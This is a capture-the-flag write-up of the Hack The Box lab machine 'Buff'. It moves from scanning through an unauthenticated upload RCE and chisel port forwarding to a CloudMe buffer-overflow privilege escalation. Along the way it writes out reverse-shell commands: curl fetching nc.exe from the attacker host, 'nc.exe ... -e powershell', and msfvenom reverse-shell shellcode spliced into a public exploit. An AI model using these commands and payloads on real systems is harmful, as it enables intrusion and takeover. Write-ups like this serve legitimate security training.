Buff (HTB)
nmap
# Nmap 7.92 scan initiated Tue Nov 23 15:49:13 2021 as: nmap -Pn -sCV -p- -oN buff 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.074s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 23 15:53:35 2021 -- 1 IP address (1 host up) scanned in 261.93 seconds
gobuster
[tyco㉿4YE: ~/htb/buff/scans]$ gobuster dir -u http://10.10.10.198:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt,sh -o gobuster -k
/img (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/img/]
/home.php (Status: 200) [Size: 143]
/about.php (Status: 200) [Size: 5337]
/index.php (Status: 200) [Size: 4969]
/profile (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/profile/]
/contact.php (Status: 200) [Size: 4169]
/register.php (Status: 200) [Size: 137]
/feedback.php (Status: 200) [Size: 4252]
/upload (Status: 301) [Size: 344] [--> http://10.10.10.198:8080/upload/]
/upload.php (Status: 200) [Size: 107]
/edit.php (Status: 200) [Size: 4282]
/license (Status: 200) [Size: 18025]
/up.php (Status: 200) [Size: 209]
/packages.php (Status: 200) [Size: 7791]
/examples (Status: 503) [Size: 1058]
/include (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/include/]
/licenses (Status: 403) [Size: 1203]
/facilities.php (Status: 200) [Size: 5961]
unauthenticated remote code execution (RCE)
From the Contact
page, I was able to enumerate that this gym website was mrb3n's Bro Hut
(also says that on the tabs) running on Gym Management Software 1.0
The first search result was an unauthenticated RCE vulnerability on ExploitDB. The vulnerability lies in the /upload.php
directory. There is an unauthenticated file upload that does not check for valid user sessions to upload files. This means that we can upload a malicious payload to get a reverse shell onto the system.
[tyco㉿4YE: ~/htb/buff/scans]$ python 48506.py http://10.10.10.198:8080/
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and wil
l be removed in the next release.
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>
On Windows systems, this first things I do is run whoami /all
and systeminfo
to get what permissions the shaun
user has, and enumerate the Windows version to see if there any vulnerabilities.
C:\xampp\htdocs\gym\upload> whoami /all
USER INFORMATION
----------------
User Name SID
========== ==============================================
buff\shaun S-1-5-21-2277156429-3381729605-2640630771-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\xampp\htdocs\gym\upload> systeminfo
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 14:05:58
System Boot Time: 23/11/2021, 23:58:05
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 19/06/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,430 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,268 MB
Virtual Memory: In Use: 2,531 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.198
[02]: fe80::3db3:5dce:8187:de70
[03]: dead:beef::20b
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
I copied this systeminfo
output back to Kali to use a tool called Windows Exploit Suggester
(WES). WES takes the output of systeminfo
, and compares it to a database to see if there are vulnerabilities to exploit.
[tyco㉿4YE: ~/htb/buff]$ python windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2021-11-23-mssb.xls
[*] done
[tyco㉿4YE: ~/htb/buff]$ python windows-exploit-suggester.py --database 2021-11-23-mssb.xls --systeminfo systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 160 potential bulletins(s) with a database of 137 known exploits
[*] there are now 160 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 10 64-bit'
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[E] MS16-129: Cumulative Security Update for Microsoft Edge (3199057) - Critical
[*] https://www.exploit-db.com/exploits/40990/ -- Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution
[*] https://github.com/theori-io/chakra-2016-11
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 Java Script Stack Walker Memory Corruption (MS15-056)
[*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 Java Script Stack Walker memory corruption
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[*] https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC
manual enumeration
getting a new, better shell
Looking at the suggestions, I did not think any of these would work. Most of the ones listed here are for older Windows systems. I did go through each just to see if it was usable, but they did not look exploitable. Unfortunately, the shell you get from the initial exploit is very limited. I could not create or change directories, so I created another reverse shell within the current shell. The curl
command was on Buff, so I could use it to transfer over the netcat executable.
[tyco㉿4YE: ~/htb/buff]$ locate nc.exe
/home/tyco/htb/buff/nc.exe
/home/tyco/htb/granny/nc.exe
/home/tyco/htb/optimum/nc.exe
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe
The executable is located in /usr/share/windows-resources/binaries/nc.exe
, so we are going to copy it over to my current directory and host a Python HTTP server to curl it from Buff machine.
[tyco㉿4YE: ~/htb/buff]$ cp /usr/share/windows-resources/binaries/nc.exe .
[tyco㉿4YE: ~/htb/buff]$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
PS C:\Users\shaun> curl 10.10.14.15:8000/nc.exe -o nc.exe
With the netcat
executable on the Buff machine, we are going to use it to create another reverse shell.
PS C:\Users\shaun> nc.exe 10.10.14.15 4445 -e powershell
Spawn a reverse shell back to your Kali IP, and set up a listener to pick it up.
[tyco㉿4YE:~/htb/buff]$ rlwrap nc -nvlp 4445
listening on [any] 4445 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.198] 50029
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
finding internal ports
Now with that all set up, I started to manually enumerate the system. I first started in the user shaun
’s directory. I ran dir -s
, which recursively goes through each folder in shaun
’s home directory to see if there are any files in there. There were 2 files of interest: Tasks.bat
and CloudMe_1112.exe
.
PS C:\Users\shaun> dir -s
Directory: C:\Users\shaun\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/06/2020 22:26 30 Tasks.bat
Directory: C:\Users\shaun\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/06/2020 16:26 17830824 CloudMe_1112.exe
PS C:\Users\shaun> type Documents\Tasks.bat
START C:/xampp/xampp_start.exe
A quick search of cloudme 1112 exploit
showed a buffer overflow exploit for version 1.11.2 of CloudMe. This looks promising, and might be the route we head down.
I continued enumerating by seeing if there were services running internally on the system. I ran netstat -ano
(-anob requires administrative rights).
netstat
stands for network statistics, and shows informaton on ports and TCP/UDP connections. Running netstat
by itself will only show ESTABLISHED
connections, which means connections that are already connected. There are flags that can be used to show more details that will help with the enumeration.
-a
: Shows ALL TCP/UDP connections-n
: shows IP instead of hostnames-o
: shows the process ID associated with the connection-b
: shows the executable that created the connection
PS C:\xampp\htdocs\gym\upload> netstat -ano
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 3204
TCP 10.10.10.198:8080 10.10.14.15:51882 CLOSE_WAIT 3204
TCP 10.10.10.198:8080 10.10.14.15:51892 ESTABLISHED 3204
TCP 127.0.0.1:3306 BUFF:0 LISTENING 1252
TCP 127.0.0.1:8888 BUFF:0 LISTENING 6900
The netstat
command shows port 8080, which is what the gym website is running on. 0.0.0.0
means that port 8080 is running on ALL network interfaces, which is how we can access the website on our browser. The Foreign Address
column shows IP and port of remote conections. In this case, it is coming from my Kali IP. There are also 2 interesting ports being ran locally. One is MySQL, and another service running on 8888.
I also ran tasklist
, which is a command to list the running processes on the system. There are 2 processes that were interesting to me. MySQL and CloudMe are running.
PS C:\xampp\htdocs\gym\upload> tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
mysqld.exe 1252 0 4,444 K
CloudMe.exe 8508 0 18,024 K
reverse forwarding the internal ports
Normally on Linux, I would use SSH to forward these ports to my Kali machine, but this won’t work on Windows without providing credentials to the current account.
I used chisel to forward the local ports to my Kali machine. Download the Linux and Windows version. The Linux executable will be used as the server running on Kali, and the Windows executable is the client that will connect back to Kali.
SERVER (LINUX): ./chisel server --reverse --port 4445
CLIENT (WINDOWS): .\chisel.exe client 10.10.14.15:4445 R:3306:localhost:3306 R:8888:localhost:8888
With the chisel
set up on Kali, run the chisel
client to open up the two ports. You should see the connection work:
PS C:\Users\shaun> .\chisel.exe client 10.10.14.15:4445 R:3306:localhost:3306 R:8888:localhost:8888
2021/11/24 04:14:27 client: Connected (Latency 202.2782ms)
[tyco㉿4YE: ~/htb/buff]$ ./chisel server --reverse --port 4445
2021/11/23 19:58:56 server: Reverse tunnelling enabled
2021/11/23 19:58:56 server: Fingerprint TzUF5zd5ccYcMud5O5HpCFSfWdGxhN5+oDhVVkozBh0=
2021/11/23 19:58:56 server: Listening on http://0.0.0.0:4445
2021/11/23 20:03:02 server: session#1: tun: proxy#R:3306=>localhost:3306: Listening
2021/11/23 20:03:02 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
MySQL database
Now, let’s access the MySQL database from our Kali machine
[tyco㉿4YE: ~/htb/buff]$ mysql -u root -p -h 127.0.0.1
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 131
Server version: 10.4.11-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
We got in with the default root account that has no password!
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| phpmyadmin |
| table |
| test |
+--------------------+
6 rows in set (1.146 sec)
MariaDB [table]> use phpmyadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
MariaDB [phpmyadmin]> show tables;
+------------------------+
| Tables_in_phpmyadmin |
+------------------------+
| pma__bookmark |
| pma__central_columns |
| pma__column_info |
| pma__designer_settings |
| pma__export_templates |
| pma__favorite |
| pma__history |
| pma__navigationhiding |
| pma__pdf_pages |
| pma__recent |
| pma__relation |
| pma__savedsearches |
| pma__table_coords |
| pma__table_info |
| pma__table_uiprefs |
| pma__tracking |
| pma__userconfig |
| pma__usergroups |
| pma__users |
+------------------------+
19 rows in set (0.164 sec)
There was nothing interesting in the myphpadmin
database, so I moved on to CloudMe. Let’s take a look at the PoC and see if the exploit works.
CloudMe service
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
We see here that the exploit needs the CloudMe service running. We already have access to this service by using chisel
, so all we have to do is run the script.
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
This portion of the exploit is the contents of the payload if you were to run the msfvenom
command. We are going to modify this part with our own payload to get a reverse shell.
[tyco㉿4YE: ~/htb/buff]$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=4447 -b '\x00\x0A\x0D' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf = b""
buf += b"\xdb\xd3\xd9\x74\x24\xf4\x58\xbb\xc1\x90\x6c\x82\x29"
buf += b"\xc9\xb1\x52\x83\xc0\x04\x31\x58\x13\x03\x99\x83\x8e"
buf += b"\x77\xe5\x4c\xcc\x78\x15\x8d\xb1\xf1\xf0\xbc\xf1\x66"
buf += b"\x71\xee\xc1\xed\xd7\x03\xa9\xa0\xc3\x90\xdf\x6c\xe4"
buf += b"\x11\x55\x4b\xcb\xa2\xc6\xaf\x4a\x21\x15\xfc\xac\x18"
buf += b"\xd6\xf1\xad\x5d\x0b\xfb\xff\x36\x47\xae\xef\x33\x1d"
buf += b"\x73\x84\x08\xb3\xf3\x79\xd8\xb2\xd2\x2c\x52\xed\xf4"
buf += b"\xcf\xb7\x85\xbc\xd7\xd4\xa0\x77\x6c\x2e\x5e\x86\xa4"
buf += b"\x7e\x9f\x25\x89\x4e\x52\x37\xce\x69\x8d\x42\x26\x8a"
buf += b"\x30\x55\xfd\xf0\xee\xd0\xe5\x53\x64\x42\xc1\x62\xa9"
buf += b"\x15\x82\x69\x06\x51\xcc\x6d\x99\xb6\x67\x89\x12\x39"
buf += b"\xa7\x1b\x60\x1e\x63\x47\x32\x3f\x32\x2d\x95\x40\x24"
buf += b"\x8e\x4a\xe5\x2f\x23\x9e\x94\x72\x2c\x53\x95\x8c\xac"
buf += b"\xfb\xae\xff\x9e\xa4\x04\x97\x92\x2d\x83\x60\xd4\x07"
buf += b"\x73\xfe\x2b\xa8\x84\xd7\xef\xfc\xd4\x4f\xd9\x7c\xbf"
buf += b"\x8f\xe6\xa8\x10\xdf\x48\x03\xd1\x8f\x28\xf3\xb9\xc5"
buf += b"\xa6\x2c\xd9\xe6\x6c\x45\x70\x1d\xe7\x60\x8f\x13\xf8"
buf += b"\x1c\x8d\x2b\x17\x82\x18\xcd\x7d\x2c\x4d\x46\xea\xd5"
buf += b"\xd4\x1c\x8b\x1a\xc3\x59\x8b\x91\xe0\x9e\x42\x52\x8c"
buf += b"\x8c\x33\x92\xdb\xee\x92\xad\xf1\x86\x79\x3f\x9e\x56"
buf += b"\xf7\x5c\x09\x01\x50\x92\x40\xc7\x4c\x8d\xfa\xf5\x8c"
buf += b"\x4b\xc4\xbd\x4a\xa8\xcb\x3c\x1e\x94\xef\x2e\xe6\x15"
buf += b"\xb4\x1a\xb6\x43\x62\xf4\x70\x3a\xc4\xae\x2a\x91\x8e"
buf += b"\x26\xaa\xd9\x10\x30\xb3\x37\xe7\xdc\x02\xee\xbe\xe3"
buf += b"\xab\x66\x37\x9c\xd1\x16\xb8\x77\x52\x26\xf3\xd5\xf3"
buf += b"\xaf\x5a\x8c\x41\xb2\x5c\x7b\x85\xcb\xde\x89\x76\x28"
buf += b"\xfe\xf8\x73\x74\xb8\x11\x0e\xe5\x2d\x15\xbd\x06\x64"
I copied the command from the exploit, and modified the -p
flag. I changed it to a regular reverse shell, and added my Kali IP and port to connect.
[tyco㉿4YE: ~/htb/buff]$ python 48389
Traceback (most recent call last):
File "48389", line 50, in <module>
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
NameError: name 'payload' is not defined
One thing to note here is that this won’t work right away. When you run the exploit, it will error out and say that the variable payload
is not defined. We can fix this by adding payload = buf
at the end of the payload so that it will run.
[tyco㉿4YE:~/htb/buff]$ nc -nvlp 4447
listening on [any] 4447 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.198] 50029
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator